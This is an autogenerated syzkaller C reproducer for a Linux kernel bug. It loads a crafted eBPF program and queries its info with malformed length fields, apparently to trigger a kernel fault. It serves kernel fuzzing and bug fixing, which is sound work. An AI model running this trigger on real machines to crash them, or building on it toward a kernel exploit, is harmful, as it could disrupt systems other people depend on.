// https://syzkaller.appspot.com/bug?id=60ad664771482c1c19766ee94cb710d9c352570c // autogenerated by syzkaller (https://github.com/google/syzkaller) #define _GNU_SOURCE #include #include #include #include #include #include #include #include #ifndef __NR_bpf #define __NR_bpf 280 #endif #ifndef __NR_mmap #define __NR_mmap 222 #endif #define BITMASK(bf_off, bf_len) (((1ull << (bf_len)) - 1) << (bf_off)) #define STORE_BY_BITMASK(type, htobe, addr, val, bf_off, bf_len) \ *(type*)(addr) = \ htobe((htobe(*(type*)(addr)) & ~BITMASK((bf_off), (bf_len))) | \ (((type)(val) << (bf_off)) & BITMASK((bf_off), (bf_len)))) uint64_t r[1] = {0xffffffffffffffff}; int main(void) { syscall(__NR_mmap, /*addr=*/0x1ffff000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/(intptr_t)-1, /*offset=*/0ul); syscall(__NR_mmap, /*addr=*/0x20000000ul, /*len=*/0x1000000ul, /*prot=PROT_WRITE|PROT_READ|PROT_EXEC*/ 7ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/(intptr_t)-1, /*offset=*/0ul); syscall(__NR_mmap, /*addr=*/0x21000000ul, /*len=*/0x1000ul, /*prot=*/0ul, /*flags=MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE*/ 0x32ul, /*fd=*/(intptr_t)-1, /*offset=*/0ul); const char* reason; (void)reason; intptr_t res = 0; if (write(1, "executing program\n", sizeof("executing program\n") - 1)) { } // bpf$PROG_LOAD arguments: [ // cmd: const = 0x5 (8 bytes) // arg: ptr[in, bpf_prog_t[flags[bpf_prog_type, int32], // bpf_prog_attach_types, bpf_btf_id[opt], fd_bpf_prog[opt]]] { // bpf_prog_t[flags[bpf_prog_type, int32], bpf_prog_attach_types, // bpf_btf_id[opt], fd_bpf_prog[opt]] { // type: bpf_prog_type = 0xe (4 bytes) // ninsn: bytesize8 = 0x6 (4 bytes) // insns: ptr[in, bpf_instructions] { // union bpf_instructions { // framed: bpf_framed_program { // initr0: bpf_insn_init_r0 { // code: const = 0x5 (1 bytes) // dst: const = 0x0 (0 bytes) // src: const = 0x0 (1 bytes) // off: const = 0x0 (2 bytes) // imm: int32 = 0x0 (4 bytes) // code2: const = 0x71 (1 bytes) // regs2: const = 0x11 (1 bytes) // off2: const = 0x42 (2 bytes) // imm2: int32 = 0x0 (4 bytes) // } // body: array[bpf_insn] { // union bpf_insn { // func: bpf_insn_call_func { // code: const = 0x85 (1 bytes) // dst: const = 0x0 (0 bytes) // src: const = 0x1 (1 bytes) // off: const = 0x0 (2 bytes) // func: int32 = 0x2 (4 bytes) // } // } // union bpf_insn { // call: bpf_insn_call_helper_t[int32[0:__BPF_FUNC_MAX_ID]] { // code: const = 0x85 (1 bytes) // regs: const = 0x0 (1 bytes) // off: const = 0x0 (2 bytes) // func: int32 = 0x5 (4 bytes) // } // } // union bpf_insn { // exit: bpf_insn_exit { // code: const = 0x95 (1 bytes) // regs: const = 0x0 (1 bytes) // off: const = 0x0 (2 bytes) // imm: const = 0x0 (4 bytes) // } // } // } // exit: bpf_insn_exit { // code: const = 0x95 (1 bytes) // regs: const = 0x0 (1 bytes) // off: const = 0x5a5 (2 bytes) // imm: const = 0x0 (4 bytes) // } // } // } // } // license: ptr[in, buffer] { // buffer: {47 50 4c 00} (length 0x4) // } // loglev: int32 = 0x5 (4 bytes) // logsize: len = 0x29e (4 bytes) // log: ptr[out, buffer] { // buffer: (DirOut) // } // kern_version: bpf_kern_version = 0x0 (4 bytes) // flags: bpf_prog_load_flags = 0x0 (4 bytes) // prog_name: buffer: {00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00} // (length 0x10) prog_ifindex: ifindex (resource) expected_attach_type: // union bpf_prog_attach_types { // sk_skb: sk_skb_attach_types = 0x0 (4 bytes) // } // btf_fd: fd_btf (resource) // func_info_rec_size: const = 0x6 (4 bytes) // func_info: nil // func_info_cnt: len = 0x0 (4 bytes) // line_info_rec_size: const = 0x10 (4 bytes) // line_info: nil // line_info_cnt: len = 0x0 (4 bytes) // attach_btf_id: bpf_btf_id (resource) // attach_prog_fd: fd_bpf_prog (resource) // core_relo_cnt: len = 0x0 (4 bytes) // fd_array: nil // core_relos: nil // core_relo_rec_size: const = 0x10 (4 bytes) // log_true_size: int32 = 0x0 (4 bytes) // prog_token_fd: union _bpf_prog_t[flags[bpf_prog_type, int32], // bpf_prog_attach_types, bpf_btf_id[opt], // fd_bpf_prog[opt]]_prog_token_fd_wrapper { // void: buffer: {} (length 0x0) // } // pad: union _bpf_prog_t[flags[bpf_prog_type, int32], // bpf_prog_attach_types, bpf_btf_id[opt], // fd_bpf_prog[opt]]_pad_wrapper { // value: const = 0x0 (4 bytes) // } // } // } // size: len = 0x70 (8 bytes) // ] // returns fd_bpf_prog *(uint32_t*)0x20000440 = 0xe; *(uint32_t*)0x20000444 = 6; *(uint64_t*)0x20000448 = 0x20000000; *(uint8_t*)0x20000000 = 5; STORE_BY_BITMASK(uint8_t, , 0x20000001, 0, 0, 4); STORE_BY_BITMASK(uint8_t, , 0x20000001, 0, 4, 4); *(uint16_t*)0x20000002 = 0; *(uint32_t*)0x20000004 = 0; *(uint8_t*)0x20000008 = 0x71; *(uint8_t*)0x20000009 = 0x11; *(uint16_t*)0x2000000a = 0x42; *(uint32_t*)0x2000000c = 0; *(uint8_t*)0x20000010 = 0x85; STORE_BY_BITMASK(uint8_t, , 0x20000011, 0, 0, 4); STORE_BY_BITMASK(uint8_t, , 0x20000011, 1, 4, 4); *(uint16_t*)0x20000012 = 0; *(uint32_t*)0x20000014 = 2; *(uint8_t*)0x20000018 = 0x85; *(uint8_t*)0x20000019 = 0; *(uint16_t*)0x2000001a = 0; *(uint32_t*)0x2000001c = 5; *(uint8_t*)0x20000020 = 0x95; *(uint8_t*)0x20000021 = 0; *(uint16_t*)0x20000022 = 0; *(uint32_t*)0x20000024 = 0; *(uint8_t*)0x20000028 = 0x95; *(uint8_t*)0x20000029 = 0; *(uint16_t*)0x2000002a = 0x5a5; *(uint32_t*)0x2000002c = 0; *(uint64_t*)0x20000450 = 0x20000080; memcpy((void*)0x20000080, "GPL\000", 4); *(uint32_t*)0x20000458 = 5; *(uint32_t*)0x2000045c = 0x29e; *(uint64_t*)0x20000460 = 0x2000cf3d; *(uint32_t*)0x20000468 = 0; *(uint32_t*)0x2000046c = 0; memset((void*)0x20000470, 0, 16); *(uint32_t*)0x20000480 = 0; *(uint32_t*)0x20000484 = 0; *(uint32_t*)0x20000488 = -1; *(uint32_t*)0x2000048c = 6; *(uint64_t*)0x20000490 = 0; *(uint32_t*)0x20000498 = 0; *(uint32_t*)0x2000049c = 0x10; *(uint64_t*)0x200004a0 = 0; *(uint32_t*)0x200004a8 = 0; *(uint32_t*)0x200004ac = 0; *(uint32_t*)0x200004b0 = -1; *(uint32_t*)0x200004b4 = 0; *(uint64_t*)0x200004b8 = 0; *(uint64_t*)0x200004c0 = 0; *(uint32_t*)0x200004c8 = 0x10; *(uint32_t*)0x200004cc = 0; *(uint32_t*)0x200004d0 = 0; res = syscall(__NR_bpf, /*cmd=*/5ul, /*arg=*/0x20000440ul, /*size=*/0x70ul); if (res != -1) r[0] = res; // bpf$BPF_GET_PROG_INFO arguments: [ // cmd: const = 0xf (8 bytes) // arg: ptr[in, bpf_get_prog_info_arg] { // bpf_get_prog_info_arg { // prog: fd_bpf_prog (resource) // len: len = 0xe0 (4 bytes) // info: ptr[out, bpf_prog_info] { // bpf_prog_info { // type: int32 = 0x0 (4 bytes) // id: bpf_prog_id (resource) // tag: int64 = 0x0 (8 bytes) // jited_prog_len: int32 = 0x0 (4 bytes) // xlated_prog_len: int32 = 0x0 (4 bytes) // jited_prog_insns: int64 = 0x0 (8 bytes) // xlated_prog_insns: int64 = 0x0 (8 bytes) // load_time: int64 = 0x0 (8 bytes) // created_by_uid: int32 = 0x0 (4 bytes) // nr_map_ids: len = 0x0 (4 bytes) // map_ids: nil // name: buffer: (DirOut) // ifindex: ifindex (resource) // gpl_compatible: int32 = 0x0 (4 bytes) // netns_dev: int64 = 0x0 (8 bytes) // netns_ino: int64 = 0x0 (8 bytes) // nr_jited_ksyms: len = 0xfe (4 bytes) // nr_jited_func_lens: len = 0x2 (4 bytes) // jited_ksyms: nil // jited_func_lens: ptr[out, array[int32]] { // array[int32] { // } // } // btf_id: bpf_btf_id (resource) // func_info_rec_size: int32 = 0x0 (4 bytes) // func_info: nil // nr_func_info: bytesize = 0x0 (4 bytes) // nr_line_info: len = 0x0 (4 bytes) // line_info: nil // jited_line_info: nil // nr_jited_line_info: len = 0x0 (4 bytes) // line_info_rec_size: int32 = 0x0 (4 bytes) // jited_line_info_rec_size: const = 0x8 (4 bytes) // nr_prog_tags: len = 0x47 (4 bytes) // prog_tags: nil // run_time_ns: int64 = 0x0 (8 bytes) // run_cnt: int64 = 0x0 (8 bytes) // recursion_misses: int64 = 0x0 (8 bytes) // verified_insns: int32 = 0x0 (4 bytes) // pad = 0x0 (4 bytes) // } // } // } // } // size: len = 0x10 (8 bytes) // ] *(uint32_t*)0x20000100 = r[0]; *(uint32_t*)0x20000104 = 0xe0; *(uint64_t*)0x20000108 = 0x20000340; *(uint32_t*)0x20000374 = 0; *(uint64_t*)0x20000378 = 0; *(uint32_t*)0x200003a8 = 0xfe; *(uint32_t*)0x200003ac = 2; *(uint64_t*)0x200003b0 = 0; *(uint64_t*)0x200003b8 = 0x20001b40; *(uint32_t*)0x200003c4 = 0; *(uint64_t*)0x200003c8 = 0; *(uint32_t*)0x200003d0 = 0; *(uint32_t*)0x200003d4 = 0; *(uint64_t*)0x200003d8 = 0; *(uint64_t*)0x200003e0 = 0; *(uint32_t*)0x200003e8 = 0; *(uint32_t*)0x200003ec = 0; *(uint32_t*)0x200003f0 = 8; *(uint32_t*)0x200003f4 = 0x47; *(uint64_t*)0x200003f8 = 0; syscall(__NR_bpf, /*cmd=*/0xful, /*arg=*/0x20000100ul, /*size=*/0x10ul); return 0; }